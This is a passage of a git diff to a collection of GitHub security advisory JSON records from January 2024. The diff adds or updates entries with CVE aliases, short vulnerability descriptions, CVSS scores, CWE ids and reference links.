"ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6942" + }, + { + "type": "WEB", + "url": "https://jvn.jp/vu/JVNVU95103362" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02" + }, + { + "type": "WEB", + "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json b/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json index b44f668daa4e2..ce87a07cc439f 100644 --- a/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json +++ b/advisories/unreviewed/2024/01/GHSA-w85m-xv37-g9v4/GHSA-w85m-xv37-g9v4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w85m-xv37-g9v4", - "modified": "2024-01-19T21:30:35Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-19T21:30:35Z", "aliases": [ "CVE-2023-47035" ], "details": "RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T20:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json b/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json index dadbf893e80c8..9a2a34d10e51b 100644 --- a/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json +++ b/advisories/unreviewed/2024/01/GHSA-w8x8-g534-x4rp/GHSA-w8x8-g534-x4rp.json @@ -36,6 +36,10 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json b/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json new file mode 100644 index 0000000000000..55b270c6535d0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wfg5-fmwh-w25j/GHSA-wfg5-fmwh-w25j.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfg5-fmwh-w25j", + "modified": "2024-01-30T06:30:23Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2024-1029" + ], + "details": "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux\"> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1029" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252302" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252302" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T06:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json b/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json new file mode 100644 index 0000000000000..dfba661921b6f --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wfhp-x3v9-6957/GHSA-wfhp-x3v9-6957.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wfhp-x3v9-6957", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0675" + ], + "details": "Vulnerability of improper checking for unusual or exceptional conditions\n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version,\n\n the exploitation of which could allow an attacker with physical access to the ATM to escape kiosk mode, access the underlying Xwindow interface and execute arbitrary commands as an unprivileged user.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0675" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json b/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json index 1b3b4b4d12247..3b36ad72e1c8f 100644 --- a/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json +++ b/advisories/unreviewed/2024/01/GHSA-wgc3-54w5-j2pq/GHSA-wgc3-54w5-j2pq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wgc3-54w5-j2pq", - "modified": "2024-01-26T00:30:27Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-26T00:30:27Z", "aliases": [ "CVE-2024-22922" ], "details": "An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remtoe attacker to escalate privileges via a crafted script to the login page in the POST/index.php", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-269" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T22:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json b/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json new file mode 100644 index 0000000000000..00c5253033426 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wgfc-hm58-hx63/GHSA-wgfc-hm58-hx63.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wgfc-hm58-hx63", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4554" + ], + "details": "Improper Restriction of XML External Entity Reference vulnerability in OpenText AppBuilder on Windows, Linux allows Server Side Request Forgery, Probe System Files.\n\nAppBuilder's XML processor is vulnerable to XML External Entity Processing (XXE), allowing an authenticated user to upload specially crafted XML files to induce server-side request forgery, disclose files local to the server that processes them.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4554" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json b/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json new file mode 100644 index 0000000000000..cc57158055eba --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-whch-9pr2-9fvq/GHSA-whch-9pr2-9fvq.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whch-9pr2-9fvq", + "modified": "2024-01-31T03:30:31Z", + "published": "2024-01-31T03:30:31Z", + "aliases": [ + "CVE-2024-1069" + ], + "details": "The Contact Form Entries plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation on the 'view_page' function in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1069" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/includes/plugin-pages.php?rev=3003884#L1213" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028640/contact-form-entries#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/120313be-9f98-4448-9f5d-a77186a6ff08?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json new file mode 100644 index 0000000000000..a898cd1f931ea --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wmcg-jxc8-7m7p/GHSA-wmcg-jxc8-7m7p.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmcg-jxc8-7m7p", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-7225" + ], + "details": "The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the width and height parameters in all versions up to, and including, 2.88.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7225" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2023-7225/" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3023266%40mappress-google-maps-for-wordpress%2Ftrunk&old=3022439%40mappress-google-maps-for-wordpress%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fce76126-0cfd-464f-b644-45d4301e958d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T08:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json b/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json index fbeda3fe5bd08..b239030e88fbc 100644 --- a/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json +++ b/advisories/unreviewed/2024/01/GHSA-wmpm-9r6p-rpww/GHSA-wmpm-9r6p-rpww.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wmpm-9r6p-rpww", - "modified": "2024-01-24T21:30:33Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2021-42146" ], "details": "An issue was discovered in Contiki-NG tinyDTLS through master branch 53a0d97. DTLS servers allow remote attackers to reuse the same epoch number within two times the TCP maximum segment lifetime, which is prohibited in RFC6347. This vulnerability allows remote attackers to obtain sensitive application (data of connected clients).", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-755" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json b/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json index f60ec2c1ad623..3a7cf0b05540d 100644 --- a/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json +++ b/advisories/unreviewed/2024/01/GHSA-wpfm-839m-3pxg/GHSA-wpfm-839m-3pxg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wpfm-839m-3pxg", - "modified": "2024-01-28T03:30:35Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-28T03:30:35Z", "aliases": [ "CVE-2024-23741" ], "details": "An issue in Hyper on macOS version 3.4.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-28T03:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json b/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json index 6281b71b71203..bff846dd1196b 100644 --- a/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json +++ b/advisories/unreviewed/2024/01/GHSA-wph3-4v72-8x34/GHSA-wph3-4v72-8x34.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wph3-4v72-8x34", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2024-0605" ], "details": "Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-362" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T19:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json b/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json new file mode 100644 index 0000000000000..137b5ec195087 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wx6g-w634-22ph/GHSA-wx6g-w634-22ph.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx6g-w634-22ph", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-30T09:30:33Z", + "aliases": [ + "CVE-2024-22646" + ], + "details": "An email address enumeration vulnerability exists in the password reset function of SEO Panel version 4.10.0. This allows an attacker to guess which emails exist on the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22646" + }, + { + "type": "WEB", + "url": "https://github.com/cassis-sec/CVE/tree/main/2024/CVE-2024-22646" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json b/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json new file mode 100644 index 0000000000000..73784411d6726 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-wxxj-43fh-x378/GHSA-wxxj-43fh-x378.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxxj-43fh-x378", + "modified": "2024-01-29T15:30:30Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2024-1005" + ], + "details": "A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1005" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/M9ERphWTXUPj" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252274" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252274" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-552" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json b/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json index 0aa97f537d3aa..c51396863928e 100644 --- a/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json +++ b/advisories/unreviewed/2024/01/GHSA-x22g-h3w3-4m5v/GHSA-x22g-h3w3-4m5v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x22g-h3w3-4m5v", - "modified": "2024-01-22T21:31:07Z", + "modified": "2024-01-29T21:30:26Z", "published": "2024-01-22T21:31:07Z", "aliases": [ "CVE-2023-48118" ], "details": "SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,9 +36,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T19:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json b/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json index e8264d8e1d714..4c8e1c63f579d 100644 --- a/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json +++ b/advisories/unreviewed/2024/01/GHSA-x4g7-cr9m-3wfr/GHSA-x4g7-cr9m-3wfr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x4g7-cr9m-3wfr", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T21:31:02Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35836" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target's Wi-Fi networks.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json b/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json index d06bc75ce9afb..808fd3ed6d7aa 100644 --- a/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json +++ b/advisories/unreviewed/2024/01/GHSA-x697-v25m-6phv/GHSA-x697-v25m-6phv.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0553" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0627" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0553" @@ -33,10 +41,18 @@ "type": "WEB", "url": "https://gitlab.com/gnutls/gnutls/-/issues/1522" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0011/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json b/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json index 5991a167f2198..d75a1e7123377 100644 --- a/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json +++ b/advisories/unreviewed/2024/01/GHSA-x73f-6qwm-hh3x/GHSA-x73f-6qwm-hh3x.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x73f-6qwm-hh3x", - "modified": "2024-01-23T15:30:58Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T15:30:58Z", "aliases": [ "CVE-2024-0748" ], "details": "A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T14:15:38Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json b/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json index 1fdf8077d2cb5..ddc7e04ae9356 100644 --- a/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json +++ b/advisories/unreviewed/2024/01/GHSA-x77j-46hj-595v/GHSA-x77j-46hj-595v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x77j-46hj-595v", - "modified": "2024-01-19T21:30:35Z", + "modified": "2024-01-30T15:30:21Z", "published": "2024-01-19T21:30:35Z", "aliases": [ "CVE-2023-33295" ], "details": "Cohesity DataProtect 6.8.1 and 6.6.0d was discovered to have a incorrect access control vulnerability due to a lack of TLS Certificate Validation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-19T20:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json b/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json index 0b229cc835cdd..5ca6dbcac48b9 100644 --- a/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json +++ b/advisories/unreviewed/2024/01/GHSA-x83f-9m8f-428q/GHSA-x83f-9m8f-428q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x83f-9m8f-428q", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0808" ], "details": "Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,9 +40,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-191" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json b/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json new file mode 100644 index 0000000000000..0eaa430106204 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-x8fv-5w4j-wcrj/GHSA-x8fv-5w4j-wcrj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x8fv-5w4j-wcrj", + "modified": "2024-01-30T03:30:30Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2024-1027" + ], + "details": "A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252300" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252300" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json b/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json index ce10beb68d91a..c42946aec1793 100644 --- a/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json +++ b/advisories/unreviewed/2024/01/GHSA-x8jc-9x8v-27f5/GHSA-x8jc-9x8v-27f5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x8jc-9x8v-27f5", - "modified": "2024-01-26T18:30:34Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T03:31:07Z", "aliases": [ "CVE-2023-42935" ], "details": "An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.", 